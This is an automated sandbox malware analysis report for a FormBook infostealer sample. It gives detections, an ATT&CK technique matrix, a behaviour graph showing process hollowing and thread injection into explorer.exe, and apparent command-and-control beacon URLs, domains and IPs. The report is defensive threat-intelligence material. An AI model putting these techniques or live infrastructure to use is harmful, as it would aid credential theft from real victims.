          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10012E00 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Application Shimming1Process Injection612Virtualization/Sandbox Evasion2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsApplication Shimming1Process Injection612LSASS MemorySecurity Software Discovery151Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502137 Sample: pago atrasado.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 31 www.shopthatlookboutique.com 2->31 33 www.christinegagnonjewellery.com 2->33 35 shops.myshopify.com 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 5 other signatures 2->49 11 pago atrasado.exe 17 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\xpbpx.dll, PE32 11->29 dropped 63 Injects a PE file into a foreign processes 11->63 15 pago atrasado.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.itskosi.com 18->37 39 www.crisisinterventionadvocates.com 74.208.236.134, 49793, 80 ONEANDONE-ASBrauerstrasse48DE United States 18->39 41 10 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 53 Performs DNS queries to domains with low reputation 18->53 22 colorcpl.exe 18->22         started        signatures11 process12 signatures13 55 Self deletion via cmd delete 22->55 57 Modifies the context of a thread in another process (thread injection) 22->57 59 Maps a DLL or memory area into another process 22->59 61 Tries to detect virtualization through RDTSC time measurements 22->61 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          pago atrasado.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.pago atrasado.exe.2330000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.pago atrasado.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.pago atrasado.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          16.2.colorcpl.exe.4a4796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          16.2.colorcpl.exe.2b2c88.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.pago atrasado.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.pago atrasado.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.pago atrasado.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff20%Avira URL Cloudsafe
          www.crisisinterventionadvocates.com/u9xn/0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf0%Avira URL Cloudsafe
          http://www.highvizpeople.com/Migraine_Pain_Relief.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans0%Avira URL Cloudsafe
          http://www.oddanimalsink.com/u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo0%Avira URL Cloudsafe
          http://www.highvizpeople.com/__media__/js/trademark.php?d=highvizpeople.com&type=ns0%Avira URL Cloudsafe
          http://www.crisisinterventionadvocates.com/u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo0%Avira URL Cloudsafe
          http://www.highvizpeople.com/song_lyrics.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FLdrtTp0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otf0%Avira URL Cloudsafe
          http://www.highvizpeople.com/__media__/design/underconstructionnotice.php?d=highvizpeople.com0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/27587/Right.png)0%Avira URL Cloudsafe
          http://www.highvizpeople.com/px.js?ch=20%Avira URL Cloudsafe
          http://www.highvizpeople.com/px.js?ch=10%Avira URL Cloudsafe
          http://www.itskosi.com/u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix0%Avira URL Cloudsafe
          http://www.highvizpeople.com/10_Best_Mutual_Funds.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX0%Avira URL Cloudsafe
          http://www.highvizpeople.com/Best_Penny_Stocks.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2F0%Avira URL Cloudsafe
          http://www.highvizpeople.com/Accident_Lawyers.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FL0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/27587/Left.png)0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
          http://www.everythangbutwhite.com/u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff20%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot0%Avira URL Cloudsafe
          http://www.highvizpeople.com/u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo0%Avira URL Cloudsafe
          http://www.highvizpeople.com/sk-logabpstatus.php?a=MzZzaVd5UDZhY0hEU3Z1UzFXVHRjNXcrTjlwaWZWbWlYbHV5Y0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/27587/BG_2.png)0%Avira URL Cloudsafe
          http://www.everythangbutwhite.com/0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix0%Avira URL Cloudsafe
          http://www.highvizpeople.com/display.cfm0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf0%Avira URL Cloudsafe
          http://www.Highvizpeople.com0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/27586/searchbtn.png)0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot0%Avira URL Cloudsafe
          http://www.everythangbutwhite.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.everythangbutwhite.com
          		3.64.163.50
          		truetrue
            		unknown
            oddanimalsink.com
            		34.102.136.180
            		truefalse
              		unknown
              www.highvizpeople.com
              		208.91.197.27
              		truetrue
                		unknown
                www.itskosi.com
                		46.101.121.244
                		truetrue
                  		unknown
                  www.crisisinterventionadvocates.com
                  		74.208.236.134
                  		truetrue
                    		unknown
                    shops.myshopify.com
                    		23.227.38.74
                    		truefalse
                      		unknown
                      www.baybeg.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.shopthatlookboutique.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.christinegagnonjewellery.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.ttemola.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.oddanimalsink.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.ishhs.xyz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.sfcn-dng.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.umgaleloacademy.com
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      www.crisisinterventionadvocates.com/u9xn/true
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.oddanimalsink.com/u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdofalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.crisisinterventionadvocates.com/u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdotrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.itskosi.com/u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdotrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.everythangbutwhite.com/u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdotrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.highvizpeople.com/u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdotrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.ttfcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.highvizpeople.com/Migraine_Pain_Relief.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSXcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sanscolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.highvizpeople.com/__media__/js/trademark.php?d=highvizpeople.com&type=nscolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.highvizpeople.com/song_lyrics.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FLdrtTpcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otfcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.highvizpeople.com/__media__/design/underconstructionnotice.php?d=highvizpeople.comcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woffcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woffcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://i3.cdn-image.com/__media__/pics/27587/Right.png)colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.highvizpeople.com/px.js?ch=2colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.highvizpeople.com/px.js?ch=1colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://nsis.sf.net/NSIS_ErrorErrorpago atrasado.exefalse
                                        		high
                                        http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefixcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.highvizpeople.com/10_Best_Mutual_Funds.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSXcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.highvizpeople.com/Best_Penny_Stocks.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2Fcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.highvizpeople.com/Accident_Lawyers.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FLcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-boldcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://i3.cdn-image.com/__media__/pics/27587/Left.png)colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://nsis.sf.net/NSIS_Errorpago atrasado.exefalse
                                          		high
                                          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eotcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.highvizpeople.com/sk-logabpstatus.php?a=MzZzaVd5UDZhY0hEU3Z1UzFXVHRjNXcrTjlwaWZWbWlYbHV5Ycolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/pics/27587/BG_2.png)colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.everythangbutwhite.com/colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefixcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.highvizpeople.com/display.cfmcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otfcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.Highvizpeople.comcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttfcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/js/min.js?v2.3colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/pics/27586/searchbtn.png)colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eotcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.everythangbutwhite.comcolorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          208.91.197.27
                                          		www.highvizpeople.comVirgin Islands (BRITISH)
                                          		40034CONFLUENCE-NETWORK-INCVGtrue
                                          34.102.136.180
                                          		oddanimalsink.comUnited States
                                          		15169GOOGLEUSfalse
                                          3.64.163.50
                                          		www.everythangbutwhite.comUnited States
                                          		16509AMAZON-02UStrue
                                          46.101.121.244
                                          		www.itskosi.comNetherlands
                                          		14061DIGITALOCEAN-ASNUStrue
                                          74.208.236.134
                                          		www.crisisinterventionadvocates.comUnited States
                                          		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:502137
                                          Start date:13.10.2021
                                          Start time:16:42:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 11m 17s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:pago atrasado.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:28
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/2@12/5
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 31.4% (good quality ratio 28.7%)
                                          • Quality average: 76.5%
                                          • Quality standard deviation: 31.3%
                                          HCA Information:
                                          • Successful, ratio: 85%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 95.100.218.79, 95.100.216.89, 20.50.102.62, 40.112.88.60, 2.20.178.33, 2.20.178.24, 20.82.209.104
                                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/502137/sample/pago atrasado.exe

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          208.91.197.27iAuPyHuUkk.exeGet hashmaliciousBrowse
                                          • www.vintagepaseo.com/mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5
                                          wDzceoRPhB.exeGet hashmaliciousBrowse
                                          • www.vaughnmethod.com/ed9s/?j6A=cMgc34DI6EHgRBPPCU1upM8r6W5gmyFdUZ6BCP+wlJ0AAQ+v0J4fB8uzS/jKj/yu2Uo5&2d64u=GZS0ntMXED7DC
                                          etiyrfIKft.exeGet hashmaliciousBrowse
